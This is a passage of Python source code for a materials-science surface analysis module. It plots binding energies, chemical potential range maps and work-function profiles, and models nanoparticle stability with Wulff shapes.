self.chempot_plot_addons(plt, chempot_range, str(ref_delu).split(\"_\")[1], axes, ylim=ylim)\n\n def monolayer_vs_BE(self, plot_eads=False):\n \"\"\"\n Plots the binding energy as a function of monolayers (ML), i.e.\n the fractional area adsorbate density for all facets. 
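One ML corresponds to\n        one adsorbate per primitive surface unit cell on each adsorbed surface,\n        as computed by SlabEntry.get_monolayer. 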
For each\n        facet at a specific monolayer, only plot the lowest binding energy.\n\n        Args:\n            plot_eads (bool): Option to plot the adsorption energy (binding\n                energy multiplied by number of adsorbates) instead.\n\n        Returns:\n            Plot: Plot of binding energy vs monolayer for all facets.\n        \"\"\"\n        ax = pretty_plot(width=8, height=7)\n        for hkl in self.all_slab_entries:\n            ml_be_dict = {}\n            for clean_entry in self.all_slab_entries[hkl]:\n                if self.all_slab_entries[hkl][clean_entry]:\n                    for ads_entry in self.all_slab_entries[hkl][clean_entry]:\n                        if ads_entry.get_monolayer not in ml_be_dict:\n                            ml_be_dict[ads_entry.get_monolayer] = float(\"inf\")\n                        be = ads_entry.gibbs_binding_energy(eads=plot_eads)\n                        if be < ml_be_dict[ads_entry.get_monolayer]:\n                            ml_be_dict[ads_entry.get_monolayer] = be\n            # sort the binding energies and monolayers\n            # in order to properly draw a line plot\n            vals = sorted(ml_be_dict.items())\n            monolayers, BEs = zip(*vals)\n            ax.plot(monolayers, BEs, \"-o\", c=self.color_dict[clean_entry], label=hkl)\n\n        adsorbates = tuple(ads_entry.ads_entries_dict)\n        ax.set_xlabel(f\"{' '.join(adsorbates)} Coverage (ML)\")\n        ax.set_ylabel(\"Adsorption Energy (eV)\" if plot_eads else \"Binding Energy (eV)\")\n        ax.legend()\n        plt.tight_layout()\n        return ax\n\n    @staticmethod\n    def chempot_plot_addons(ax, xrange, ref_el, pad=2.4, rect=None, ylim=None):\n        \"\"\"\n        Helper function to make a chempot plot look nicer.\n\n        Args:\n            ax (plt.Axes): Axes object to add the annotations to.\n            xrange (list): xlim parameter\n            ref_el (str): Element of the referenced chempot.\n            pad (float): For tight layout\n            rect (list): For tight layout\n            ylim (list): ylim parameter\n\n        return (plt.Axes): Modified axes with addons.\n        \"\"\"\n        # Make the figure look nice\n        plt.legend(bbox_to_anchor=(1.01, 1), loc=2, borderaxespad=0.0)\n        ax.set_xlabel(rf\"Chemical potential $\\Delta\\mu_{{{ref_el}}}$ (eV)\")\n\n        ylim = ylim or ax.get_ylim()\n        plt.xticks(rotation=60)\n        plt.ylim(ylim)\n        xlim = ax.get_xlim()\n        plt.xlim(xlim)\n        plt.tight_layout(pad=pad, rect=rect or [-0.047, 0, 0.84, 1])\n        plt.plot([xrange[0], xrange[0]], ylim, \"--k\")\n        plt.plot([xrange[1], xrange[1]], ylim, \"--k\")\n        xy = [np.mean([xrange[1]]), np.mean(ylim)]\n        plt.annotate(f\"{ref_el}-rich\", xy=xy, xytext=xy, rotation=90, fontsize=17)\n        xy = [np.mean([xlim[0]]), np.mean(ylim)]\n        plt.annotate(f\"{ref_el}-poor\", xy=xy, xytext=xy, rotation=90, fontsize=17)\n\n        return ax\n\n    def BE_vs_clean_SE(\n        self,\n        delu_dict,\n        delu_default=0,\n        plot_eads=False,\n        annotate_monolayer=True,\n        JPERM2=False,\n    ):\n        \"\"\"\n        For each facet, plot the clean surface energy against the most\n        stable binding energy.\n\n        Args:\n            delu_dict (dict): Dictionary of the chemical potentials to be set as\n                constant. 
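(Unlike most methods\n                here, delu_dict is a required argument because the clean surface\n                energy must be evaluated to a number.) 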
Note the key should be a sympy Symbol object of the\n                format: Symbol(\"delu_el\") where el is the name of the element.\n            delu_default (float): Default value for all unset chemical potentials\n            plot_eads (bool): Option to plot the adsorption energy (binding\n                energy multiplied by number of adsorbates) instead.\n            annotate_monolayer (bool): Whether or not to label each data point\n                with its monolayer (adsorbate density per unit primitive area)\n            JPERM2 (bool): Whether to plot surface energy in /m^2 (True) or\n                eV/A^2 (False)\n\n        Returns:\n            Plot: Plot of clean surface energy vs binding energy for\n                all facets.\n        \"\"\"\n        ax = pretty_plot(width=8, height=7)\n        for hkl in self.all_slab_entries:\n            for clean_entry in self.all_slab_entries[hkl]:\n                all_delu_dict = self.set_all_variables(delu_dict, delu_default)\n                if self.all_slab_entries[hkl][clean_entry]:\n                    clean_se = self.as_coeffs_dict[clean_entry]\n                    se = sub_chempots(clean_se, all_delu_dict)\n                    for ads_entry in self.all_slab_entries[hkl][clean_entry]:\n                        ml = ads_entry.get_monolayer\n                        be = ads_entry.gibbs_binding_energy(eads=plot_eads)\n\n                        # Now plot the surface energy vs binding energy\n                        ax.scatter(se, be)\n                        if annotate_monolayer:\n                            ax.annotate(f\"{ml:.2f}\", xy=[se, be], xytext=[se, be])\n\n        ax.set_xlabel(r\"Surface energy ($J/m^2$)\" if JPERM2 else r\"Surface energy ($eV/\\AA^2$)\")\n        ax.set_ylabel(\"Adsorption Energy (eV)\" if plot_eads else \"Binding Energy (eV)\")\n        plt.tight_layout()\n        ax.tick_params(axis=\"x\", rotation=60)\n        return ax\n\n    def surface_chempot_range_map(\n        self,\n        elements,\n        miller_index,\n        ranges,\n        incr=50,\n        no_doped=False,\n        no_clean=False,\n        delu_dict=None,\n        ax=None,\n        annotate=True,\n        show_unphyiscal_only=False,\n        fontsize=10,\n    ) -> plt.Axes:\n        \"\"\"\n        Adapted from the get_chempot_range_map() method in the PhaseDiagram\n        class. Plot the chemical potential range map based on surface\n        energy stability. Currently works only for 2-component PDs. At\n        the moment uses a brute force method by enumerating through the\n        range of the first element chempot with a specified increment\n        and determines the chempot range of the second element for each\n        SlabEntry. Future implementation will determine the chempot range\n        map first by solving systems of equations up to 3 instead of 2.\n\n        Args:\n            elements (list): Sequence of elements to be considered as independent\n                variables. E.g., if you want to show the stability ranges of\n                all Li-Co-O phases wrt delu_Li and delu_O, you will supply\n                [Element(\"Li\"), Element(\"O\")]\n            miller_index ([h, k, l]): Miller index of the surface we are interested in\n            ranges ([[range1], [range2]]): List of chempot ranges (max and min values)\n                for the first and second element.\n            incr (int): Number of points to sample along the range of the first chempot\n            no_doped (bool): Whether to exclude doped/adsorbed systems.\n            no_clean (bool): Whether to exclude clean systems.\n            delu_dict (dict): Dictionary of the chemical potentials to be set as\n                constant. Note the key should be a sympy Symbol object of the\n                format: Symbol(\"delu_el\") where el is the name of the element.\n            ax (plt.Axes): Axes object to plot on. If None, will create a new plot.\n            annotate (bool): Whether to annotate each \"phase\" with the label of\n                the entry. If no label, uses the reduced formula\n            show_unphyiscal_only (bool): Whether to only show the shaded region where\n                surface energy is negative. 
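In that case only the dashed boundaries where the surface energy\n                crosses zero are drawn. 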
Useful for drawing other chempot range maps.\n            fontsize (int): Font size of the annotation\n        \"\"\"\n        # Set up\n        delu_dict = delu_dict or {}\n        ax = ax if ax else pretty_plot(12, 8)\n        el1, el2 = str(elements[0]), str(elements[1])\n        delu1 = Symbol(f\"delu_{elements[0]}\")\n        delu2 = Symbol(f\"delu_{elements[1]}\")\n        range1 = ranges[0]\n        range2 = ranges[1]\n\n        # Find a range map for each entry (surface). This part is very slow, will\n        # need to implement a more sophisticated method of getting the range map\n        vertices_dict: dict[SlabEntry, list] = {}\n        for dmu1 in np.linspace(range1[0], range1[1], incr):\n            # Get chemical potential range of dmu2 for each increment of dmu1\n            new_delu_dict = delu_dict.copy()\n            new_delu_dict[delu1] = dmu1\n            range_dict, se_dict = self.stable_u_range_dict(\n                range2,\n                delu2,\n                dmu_at_0=True,\n                miller_index=miller_index,\n                no_doped=no_doped,\n                no_clean=no_clean,\n                delu_dict=new_delu_dict,\n                return_se_dict=True,\n            )\n\n            # Save the chempot range for dmu1 and dmu2\n            for entry, vertex in range_dict.items():\n                if not vertex:\n                    continue\n                vertices_dict.setdefault(entry, [])\n\n                selist = se_dict[entry]\n                vertices_dict[entry].append({delu1: dmu1, delu2: [vertex, selist]})\n\n        # Plot the edges of the phases\n        for entry, vertex in vertices_dict.items():\n            xvals, yvals = [], []\n\n            # Plot each edge of a phase within the borders\n            for ii, pt1 in enumerate(vertex):\n                # Determine if the surface energy at this lower range\n                # of dmu2 is negative. If so, shade this region.\n                if len(pt1[delu2][1]) == 3:\n                    if pt1[delu2][1][0] < 0:\n                        neg_dmu_range = [pt1[delu2][0][0], pt1[delu2][0][1]]\n                    else:\n                        neg_dmu_range = [pt1[delu2][0][1], pt1[delu2][0][2]]\n                    # Shade the threshold and region at which se<=0\n                    ax.plot([pt1[delu1], pt1[delu1]], neg_dmu_range, \"k--\")\n                elif pt1[delu2][1][0] < 0 and pt1[delu2][1][1] < 0 and not show_unphyiscal_only:\n                    # Any chempot at this point will result\n                    # in se<0, shade the entire y range\n                    ax.plot([pt1[delu1], pt1[delu1]], range2, \"k--\")\n\n                if ii == len(vertex) - 1:\n                    break\n                pt2 = vertex[ii + 1]\n                if not show_unphyiscal_only:\n                    ax.plot(\n                        [pt1[delu1], pt2[delu1]],\n                        [pt1[delu2][0][0], pt2[delu2][0][0]],\n                        \"k\",\n                    )\n\n                # Need these values to get a good position for labelling phases\n                xvals.extend([pt1[delu1], pt2[delu1]])\n                yvals.extend([pt1[delu2][0][0], pt2[delu2][0][0]])\n\n            # Plot the edge along the max x value\n            pt = vertex[-1]\n            # unpack the two chempot symbols stored as the keys of this vertex\n            delu1, delu2 = pt\n            xvals.extend([pt[delu1], pt[delu1]])\n            yvals.extend(pt[delu2][0])\n            if not show_unphyiscal_only:\n                ax.plot([pt[delu1], pt[delu1]], [pt[delu2][0][0], pt[delu2][0][-1]], \"k\")\n\n            if annotate:\n                # Label the phases\n                x = np.mean([max(xvals), min(xvals)])\n                y = np.mean([max(yvals), min(yvals)])\n                label = entry.label if entry.label else entry.composition.reduced_formula\n                ax.annotate(label, xy=[x, y], xytext=[x, y], fontsize=fontsize)\n\n        # Label plot\n        ax.set(xlim=range1, ylim=range2)\n        ax.set_xlabel(rf\"$\\Delta\\mu_{{{el1}}} (eV)$\", fontsize=25)\n        ax.set_ylabel(rf\"$\\Delta\\mu_{{{el2}}} (eV)$\", fontsize=25)\n        ax.tick_params(axis=\"x\", rotation=60)\n\n        return ax\n\n    def set_all_variables(self, delu_dict, delu_default):\n        \"\"\"\n        Sets all chemical potential values and returns a dictionary where\n        the key is a sympy Symbol and the value is a float (chempot).\n\n        Args:\n            delu_dict (dict): Dictionary of the chemical potentials to be set as\n                constant. 
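For example, if list_of_chempots were\n                [Symbol(\"delu_O\"), Symbol(\"delu_H\")] (hypothetical), then\n                set_all_variables({Symbol(\"delu_O\"): -1.0}, 0) would return\n                {Symbol(\"delu_O\"): -1.0, Symbol(\"delu_H\"): 0}. 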
Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n\n Returns:\n Dictionary of set chemical potential values\n \"\"\"\n # Set up the variables\n all_delu_dict = {}\n for du in self.list_of_chempots:\n if delu_dict and du in delu_dict:\n all_delu_dict[du] = delu_dict[du]\n elif du == 1:\n all_delu_dict[du] = du\n else:\n all_delu_dict[du] = delu_default\n\n return all_delu_dict\n\n\ndef entry_dict_from_list(all_slab_entries):\n \"\"\"\n Converts a list of SlabEntry to an appropriate dictionary. It is\n assumed that if there is no adsorbate, then it is a clean SlabEntry\n and that adsorbed SlabEntry has the clean_entry parameter set.\n\n Args:\n all_slab_entries (list): List of SlabEntry objects\n\n Returns:\n (dict): Dictionary of SlabEntry with the Miller index as the main\n key to a dictionary with a clean SlabEntry as the key to a\n list of adsorbed SlabEntry.\n \"\"\"\n entry_dict = {}\n\n for entry in all_slab_entries:\n hkl = tuple(entry.miller_index)\n if hkl not in entry_dict:\n entry_dict[hkl] = {}\n clean = entry.clean_entry if entry.clean_entry else entry\n if clean not in entry_dict[hkl]:\n entry_dict[hkl][clean] = []\n if entry.adsorbates:\n entry_dict[hkl][clean].append(entry)\n\n return entry_dict\n\n\nclass WorkFunctionAnalyzer:\n \"\"\"\n A class used for calculating the work function from a slab model and\n visualizing the behavior of the local potential along the slab.\n\n Attributes:\n efermi (float): The Fermi energy.\n locpot_along_c (list): Local potential in eV along points along the c axis.\n vacuum_locpot (float): The maximum local potential along the c direction for the slab model,\n i.e. 
the potential at the vacuum.\n        work_function (float): The minimum energy needed to move an electron from the surface to infinity.\n            Defined as the difference between the potential at the vacuum and the Fermi energy.\n        slab (Slab): The slab structure model.\n        along_c (list): Points along the c direction with same increments as the locpot in the c axis.\n        ave_locpot (float): Mean of the minimum and maximum (vacuum) locpot along c.\n        sorted_sites (list): List of sites from the slab sorted along the c direction.\n        ave_bulk_p (float): The average locpot of the slab region along the c direction.\n    \"\"\"\n\n    def __init__(self, structure: Structure, locpot_along_c, efermi, shift=0, blength=3.5):\n        \"\"\"\n        Initializes the WorkFunctionAnalyzer class.\n\n        Args:\n            structure (Structure): Structure object modelling the surface\n            locpot_along_c (list): Local potential along the c direction\n            efermi (float): The Fermi energy of the system\n            shift (float): Parameter to translate the slab (and\n                therefore the vacuum) of the slab structure, thereby\n                translating the plot along the x axis.\n            blength (float (Ang)): The longest bond length in the material.\n                Used to handle pbc for noncontiguous slab layers\n        \"\"\"\n        # ensure shift between 0 and 1\n        if shift < 0:\n            shift += -1 * int(shift) + 1\n        elif shift >= 1:\n            shift -= int(shift)\n        self.shift = shift\n\n        # properties that can be shifted\n        slab = structure.copy()\n        slab.translate_sites([i for i, site in enumerate(slab)], [0, 0, self.shift])\n        self.slab = slab\n        self.sorted_sites = sorted(self.slab, key=lambda site: site.frac_coords[2])\n\n        # Get the plot points between 0 and c\n        # increments of the number of locpot points\n        self.along_c = np.linspace(0, 1, num=len(locpot_along_c))\n\n        # Reorder the local potential so it lines up with the shifted slab\n        locpot_along_c_mid, locpot_end, locpot_start = [], [], []\n        for i, s in enumerate(self.along_c):\n            j = s + self.shift\n            if j > 1:\n                locpot_start.append(locpot_along_c[i])\n            elif j < 0:\n                locpot_end.append(locpot_along_c[i])\n            else:\n                locpot_along_c_mid.append(locpot_along_c[i])\n        self.locpot_along_c = locpot_start + locpot_along_c_mid + locpot_end\n\n        # identify slab region\n        self.slab_regions = get_slab_regions(self.slab, blength=blength)\n        # get the average of the signal in the bulk-like region of the\n        # slab, i.e. the average of the oscillating region. This gives\n        # a rough approximation 
of the potential in the interior of the slab\n bulk_p = []\n for r in self.slab_regions:\n bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if r[1] >= self.along_c[i] > r[0]])\n if len(self.slab_regions) > 1:\n bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[1][1] <= self.along_c[i]])\n bulk_p.extend([p for i, p in enumerate(self.locpot_along_c) if self.slab_regions[0][0] >= self.along_c[i]])\n self.ave_bulk_p = np.mean(bulk_p)\n\n # shift independent quantities\n self.efermi = efermi\n self.vacuum_locpot = max(self.locpot_along_c)\n # get the work function\n self.work_function = self.vacuum_locpot - self.efermi\n # for setting ylim and annotating\n self.ave_locpot = (self.vacuum_locpot - min(self.locpot_along_c)) / 2\n\n def get_locpot_along_slab_plot(self, label_energies=True, plt=None, label_fontsize=10):\n \"\"\"\n Returns a plot of the local potential (eV) vs the\n position along the c axis of the slab model (Ang).\n\n Args:\n label_energies (bool): Whether to label relevant energy\n quantities such as the work function, Fermi energy,\n vacuum locpot, bulk-like locpot\n plt (plt): Matplotlib pyplot object\n label_fontsize (float): Fontsize of labels\n\n Returns plt of the locpot vs c axis\n \"\"\"\n plt = plt if plt else pretty_plot(width=6, height=4)\n\n # plot the raw locpot signal along c\n plt.plot(self.along_c, self.locpot_along_c, \"b--\")\n\n # Get the local averaged signal of the locpot along c\n xg, yg = [], []\n for i, p in enumerate(self.locpot_along_c):\n # average signal is just the bulk-like potential when in the slab region\n in_slab = False\n for r in self.slab_regions:\n if r[0] <= self.along_c[i] <= r[1]:\n in_slab = True\n if len(self.slab_regions) > 1:\n if self.along_c[i] >= self.slab_regions[1][1]:\n in_slab = True\n if self.along_c[i] <= self.slab_regions[0][0]:\n in_slab = True\n\n if in_slab or p < self.ave_bulk_p:\n yg.append(self.ave_bulk_p)\n xg.append(self.along_c[i])\n else:\n yg.append(p)\n xg.append(self.along_c[i])\n xg, yg = zip(*sorted(zip(xg, yg)))\n plt.plot(xg, yg, \"r\", linewidth=2.5, zorder=-1)\n\n # make it look nice\n if label_energies:\n plt = self.get_labels(plt, label_fontsize=label_fontsize)\n plt.xlim([0, 1])\n plt.ylim([min(self.locpot_along_c), self.vacuum_locpot + self.ave_locpot * 0.2])\n plt.xlabel(r\"Fractional coordinates ($\\hat{c}$)\", fontsize=25)\n plt.xticks(fontsize=15, rotation=45)\n plt.ylabel(r\"Potential (eV)\", fontsize=25)\n plt.yticks(fontsize=15)\n\n return plt\n\n def get_labels(self, plt, label_fontsize=10):\n \"\"\"\n Handles the optional labelling of the plot with relevant quantities\n\n Args:\n plt (plt): Plot of the locpot vs c axis\n label_fontsize (float): Fontsize of labels\n Returns Labelled plt.\n \"\"\"\n # center of vacuum and bulk region\n if len(self.slab_regions) > 1:\n label_in_vac = (self.slab_regions[0][1] + self.slab_regions[1][0]) / 2\n if abs(self.slab_regions[0][0] - self.slab_regions[0][1]) > abs(\n self.slab_regions[1][0] - self.slab_regions[1][1]\n ):\n label_in_bulk = self.slab_regions[0][1] / 2\n else:\n label_in_bulk = (self.slab_regions[1][1] + self.slab_regions[1][0]) / 2\n else:\n label_in_bulk = (self.slab_regions[0][0] + self.slab_regions[0][1]) / 2\n if self.slab_regions[0][0] > 1 - self.slab_regions[0][1]:\n label_in_vac = self.slab_regions[0][0] / 2\n else:\n label_in_vac = (1 + self.slab_regions[0][1]) / 2\n\n plt.plot([0, 1], [self.vacuum_locpot] * 2, \"b--\", zorder=-5, linewidth=1)\n xy = [label_in_bulk, self.vacuum_locpot + 
self.ave_locpot * 0.05]\n plt.annotate(\n f\"$V_{{vac}}={self.vacuum_locpot:.2f}$\",\n xy=xy,\n xytext=xy,\n color=\"b\",\n fontsize=label_fontsize,\n )\n\n # label the fermi energy\n plt.plot([0, 1], [self.efermi] * 2, \"g--\", zorder=-5, linewidth=3)\n xy = [label_in_bulk, self.efermi + self.ave_locpot * 0.05]\n plt.annotate(\n f\"$E_F={self.efermi:.2f}$\",\n xytext=xy,\n xy=xy,\n fontsize=label_fontsize,\n color=\"g\",\n )\n\n # label the bulk-like locpot\n plt.plot([0, 1], [self.ave_bulk_p] * 2, \"r--\", linewidth=1.0, zorder=-1)\n xy = [label_in_vac, self.ave_bulk_p + self.ave_locpot * 0.05]\n plt.annotate(\n f\"$V^{{interior}}_{{slab}}={self.ave_bulk_p:.2f}$\",\n xy=xy,\n xytext=xy,\n color=\"r\",\n fontsize=label_fontsize,\n )\n\n # label the work function as a barrier\n plt.plot(\n [label_in_vac] * 2,\n [self.efermi, self.vacuum_locpot],\n \"k--\",\n zorder=-5,\n linewidth=2,\n )\n xy = [label_in_vac, self.efermi + self.ave_locpot * 0.05]\n plt.annotate(\n rf\"$\\Phi={self.work_function:.2f}$\",\n xy=xy,\n xytext=xy,\n fontsize=label_fontsize,\n )\n\n return plt\n\n def is_converged(self, min_points_frac=0.015, tol: float = 0.0025):\n \"\"\"\n A well converged work function should have a flat electrostatic\n potential within some distance (min_point) about where the peak\n electrostatic potential is found along the c direction of the\n slab. This is dependent on the size of the slab.\n\n Args:\n min_point (fractional coordinates): The number of data points\n +/- the point of where the electrostatic potential is at\n its peak along the c direction.\n tol (float): If the electrostatic potential stays the same\n within this tolerance, within the min_points, it is converged.\n\n Returns a bool (whether or not the work function is converged)\n \"\"\"\n conv_within = tol * (max(self.locpot_along_c) - min(self.locpot_along_c))\n min_points = int(min_points_frac * len(self.locpot_along_c))\n peak_i = self.locpot_along_c.index(self.vacuum_locpot)\n all_flat = []\n for i in range(len(self.along_c)):\n if peak_i - min_points < i < peak_i + min_points:\n if abs(self.vacuum_locpot - self.locpot_along_c[i]) > conv_within:\n all_flat.append(False)\n else:\n all_flat.append(True)\n return all(all_flat)\n\n @classmethod\n def from_files(cls, poscar_filename, locpot_filename, outcar_filename, shift=0, blength=3.5):\n \"\"\"\n Initializes a WorkFunctionAnalyzer from POSCAR, LOCPOT, and OUTCAR files.\n\n Args:\n poscar_filename (str): The path to the POSCAR file.\n locpot_filename (str): The path to the LOCPOT file.\n outcar_filename (str): The path to the OUTCAR file.\n shift (float): The shift value. Defaults to 0.\n blength (float): The longest bond length in the material.\n Used to handle pbc for noncontiguous slab layers. Defaults to 3.5.\n\n Returns:\n WorkFunctionAnalyzer: A WorkFunctionAnalyzer instance.\n \"\"\"\n locpot = Locpot.from_file(locpot_filename)\n outcar = Outcar(outcar_filename)\n return cls(\n Structure.from_file(poscar_filename),\n locpot.get_average_along_axis(2),\n outcar.efermi,\n shift=shift,\n blength=blength,\n )\n\n\n@due.dcite(\n Doi(\"10.1021/nl404557w\"),\n description=\"Nanoscale stabilization of sodium oxides: Implications for Na-O2 batteries\",\n)\nclass NanoscaleStability:\n \"\"\"A class for analyzing the stability of nanoparticles of different\n polymorphs with respect to size. The Wulff shape will be the model for the\n nanoparticle. 
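Quantitatively, treating the particle as sphere-like with radius r gives\n    G(r) = (4/3)*pi*r**3*dG_bulk + 4*pi*r**2*gamma_w, where gamma_w is the weighted\n    surface energy and dG_bulk the bulk formation energy per volume; two polymorphs\n    are then in equilibrium at r* = -3*d(gamma_w)/d(dG_bulk), the relation solved in\n    solve_equilibrium_point. 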
Stability will be determined by an energetic competition between the\n weighted surface energy (surface energy of the Wulff shape) and the bulk energy. A\n future release will include a 2D phase diagram (e.g. wrt size vs chempot for adsorbed\n or non-stoichiometric surfaces). Based on the following work:\n\n Kang, S., Mo, Y., Ong, S. P., & Ceder, G. (2014). Nanoscale\n stabilization of sodium oxides: Implications for Na-O2\n batteries. Nano Letters, 14(2), 1016-1020.\n https://doi.org/10.1021/nl404557w\n\n Attributes:\n se_analyzers (list[SurfaceEnergyPlotter]): Each item corresponds to a different polymorph.\n symprec (float): Tolerance for symmetry finding. See WulffShape.\n \"\"\"\n\n def __init__(self, se_analyzers, symprec=1e-5):\n \"\"\"Analyzes the nanoscale stability of different polymorphs.\"\"\"\n self.se_analyzers = se_analyzers\n self.symprec = symprec\n\n def solve_equilibrium_point(self, analyzer1, analyzer2, delu_dict=None, delu_default=0, units=\"nanometers\"):\n \"\"\"\n Gives the radial size of two particles where equilibrium is reached\n between both particles. NOTE: the solution here is not the same\n as the solution visualized in the plot because solving for r\n requires that both the total surface area and volume of the\n particles are functions of r.\n\n Args:\n analyzer1 (SurfaceEnergyPlotter): Analyzer associated with the\n first polymorph\n analyzer2 (SurfaceEnergyPlotter): Analyzer associated with the\n second polymorph\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. Note the key should be a sympy Symbol object of the\n format: Symbol(\"delu_el\") where el is the name of the element.\n delu_default (float): Default value for all unset chemical potentials\n units (str): Can be nanometers or Angstrom\n\n Returns:\n Particle radius in nm\n \"\"\"\n # Set up\n wulff1 = analyzer1.wulff_from_chempot(\n delu_dict=delu_dict or {}, delu_default=delu_default, symprec=self.symprec\n )\n wulff2 = analyzer2.wulff_from_chempot(\n delu_dict=delu_dict or {}, delu_default=delu_default, symprec=self.symprec\n )\n\n # Now calculate r\n delta_gamma = wulff1.weighted_surface_energy - wulff2.weighted_surface_energy\n delta_E = self.bulk_gform(analyzer1.ucell_entry) - self.bulk_gform(analyzer2.ucell_entry)\n r = (-3 * delta_gamma) / (delta_E)\n\n return r / 10 if units == \"nanometers\" else r\n\n def wulff_gform_and_r(\n self,\n wulffshape,\n bulk_entry,\n r,\n from_sphere_area=False,\n r_units=\"nanometers\",\n e_units=\"keV\",\n normalize=False,\n scale_per_atom=False,\n ):\n \"\"\"\n Calculates the formation energy of the particle with arbitrary radius r.\n\n Args:\n wulffshape (WulffShape): Initial, unscaled WulffShape\n bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.\n r (float (Ang)): Arbitrary effective radius of the WulffShape\n from_sphere_area (bool): There are two ways to calculate the bulk\n formation energy. 
Either by treating the volume and thus surface\n area of the particle as a perfect sphere, or as a Wulff shape.\n r_units (str): Can be nanometers or Angstrom\n e_units (str): Can be keV or eV\n normalize (bool): Whether or not to normalize energy by volume\n scale_per_atom (True): Whether or not to normalize by number of\n atoms in the particle\n\n Returns:\n particle formation energy (float in keV), effective radius\n \"\"\"\n # Set up\n miller_se_dict = wulffshape.miller_energy_dict\n new_wulff = self.scaled_wulff(wulffshape, r)\n new_wulff_area = new_wulff.miller_area_dict\n\n # calculate surface energy of the particle\n if not from_sphere_area:\n # By approximating the particle as a Wulff shape\n w_vol = new_wulff.volume\n tot_wulff_se = 0\n for hkl, v in new_wulff_area.items():\n tot_wulff_se += miller_se_dict[hkl] * v\n Ebulk = self.bulk_gform(bulk_entry) * w_vol\n new_r = new_wulff.effective_radius\n\n else:\n # By approximating the particle as a perfect sphere\n w_vol = (4 / 3) * np.pi * r**3\n sphere_sa = 4 * np.pi * r**2\n tot_wulff_se = wulffshape.weighted_surface_energy * sphere_sa\n Ebulk = self.bulk_gform(bulk_entry) * w_vol\n new_r = r\n\n new_r = new_r / 10 if r_units == \"nanometers\" else new_r\n e = Ebulk + tot_wulff_se\n e = e / 1000 if e_units == \"keV\" else e\n e = e / ((4 / 3) * np.pi * new_r**3) if normalize else e\n bulk_struct = bulk_entry.structure\n density = len(bulk_struct) / bulk_struct.volume\n e = e / (density * w_vol) if scale_per_atom else e\n\n return e, new_r\n\n @staticmethod\n def bulk_gform(bulk_entry):\n \"\"\"\n Returns the formation energy of the bulk.\n\n Args:\n bulk_entry (ComputedStructureEntry): Entry of the corresponding bulk.\n\n Returns:\n float: bulk formation energy (in eV)\n \"\"\"\n return bulk_entry.energy / bulk_entry.structure.volume\n\n def scaled_wulff(self, wulffshape, r):\n \"\"\"\n Scales the Wulff shape with an effective radius r. Note that the resulting\n Wulff does not necessarily have the same effective radius as the one\n provided. The Wulff shape is scaled by its surface energies where first\n the surface energies are scale by the minimum surface energy and then\n multiplied by the given effective radius.\n\n Args:\n wulffshape (WulffShape): Initial, unscaled WulffShape\n r (float): Arbitrary effective radius of the WulffShape\n\n Returns:\n WulffShape (scaled by r)\n \"\"\"\n # get the scaling ratio for the energies\n r_ratio = r / wulffshape.effective_radius\n miller_list = list(wulffshape.miller_energy_dict)\n # Normalize the magnitude of the facet normal vectors\n # of the Wulff shape by the minimum surface energy.\n se_list = np.array(list(wulffshape.miller_energy_dict.values()))\n # Scale the magnitudes by r_ratio\n scaled_se = se_list * r_ratio\n\n return WulffShape(wulffshape.lattice, miller_list, scaled_se, symprec=self.symprec)\n\n def plot_one_stability_map(\n self,\n analyzer,\n max_r,\n delu_dict=None,\n label=\"\",\n increments=50,\n delu_default=0,\n plt=None,\n from_sphere_area=False,\n e_units=\"keV\",\n r_units=\"nanometers\",\n normalize=False,\n scale_per_atom=False,\n ):\n \"\"\"\n Returns the plot of the formation energy of a particle against its\n effect radius.\n\n Args:\n analyzer (SurfaceEnergyPlotter): Analyzer associated with the\n first polymorph\n max_r (float): The maximum radius of the particle to plot up to.\n delu_dict (dict): Dictionary of the chemical potentials to be set as\n constant. 
Note the key should be a sympy Symbol object of the\n                format: Symbol(\"delu_el\") where el is the name of the element.\n            label (str): Label of the plot for legend\n            increments (int): Number of plot points\n            delu_default (float): Default value for all unset chemical potentials\n            plt (pyplot): Plot\n            from_sphere_area (bool): There are two ways to calculate the bulk\n                formation energy. Either by treating the volume and thus surface\n                area of the particle as a perfect sphere, or as a Wulff shape.\n            r_units (str): Can be nanometers or Angstrom\n            e_units (str): Can be keV or eV\n            normalize (bool): Whether or not to normalize energy by volume\n        \"\"\"\n        plt = plt or pretty_plot(width=8, height=7)\n\n        wulffshape = analyzer.wulff_from_chempot(delu_dict=delu_dict, delu_default=delu_default, symprec=self.symprec)\n\n        gform_list, r_list = [], []\n        for r in np.linspace(1e-6, max_r, increments):\n            gform, r = self.wulff_gform_and_r(\n                wulffshape,\n                analyzer.ucell_entry,\n                r,\n                from_sphere_area=from_sphere_area,\n                r_units=r_units,\n                e_units=e_units,\n                normalize=normalize,\n                scale_per_atom=scale_per_atom,\n            )\n            gform_list.append(gform)\n            r_list.append(r)\n\n        ru = \"nm\" if r_units == \"nanometers\" else r\"\\AA\"\n        plt.xlabel(rf\"Particle radius (${ru}$)\")\n        eu = f\"${e_units}/{ru}^3$\"\n        plt.ylabel(rf\"$G_{{form}}$ ({eu})\")\n\n        plt.plot(r_list, gform_list, label=label)\n\n        return plt\n\n    def plot_all_stability_map(\n        self,\n        max_r,\n        increments=50,\n        delu_dict=None,\n        delu_default=0,\n        plt=None,\n        labels=None,\n        from_sphere_area=False,\n        e_units=\"keV\",\n        r_units=\"nanometers\",\n        normalize=False,\n        scale_per_atom=False,\n    ):\n        \"\"\"\n        Returns the plot of the formation energy of particles\n        of different polymorphs against their effective radius.\n\n        Args:\n            max_r (float): The maximum radius of the particle to plot up to.\n            increments (int): Number of plot points\n            delu_dict (dict): Dictionary of the chemical potentials to be set as\n                constant. Note the key should be a sympy Symbol object of the\n                format: Symbol(\"delu_el\") where el is the name of the element.\n            delu_default (float): Default value for all unset chemical potentials\n            plt (pyplot): Plot\n            labels (list): List of labels for each plot, corresponds to the\n                list of se_analyzers\n            from_sphere_area (bool): There are two ways to calculate the bulk\n                formation energy. Either by treating the volume and thus surface\n                area of the particle as a perfect sphere, or as a Wulff shape.\n        \"\"\"\n        plt = plt or pretty_plot(width=8, height=7)\n\n        for i, analyzer in enumerate(self.se_analyzers):\n            label = labels[i] if labels else \"\"\n            plt = self.plot_one_stability_map(\n                analyzer,\n                max_r,\n                delu_dict,\n                label=label,\n                plt=plt,\n                increments=increments,\n                delu_default=delu_default,\n                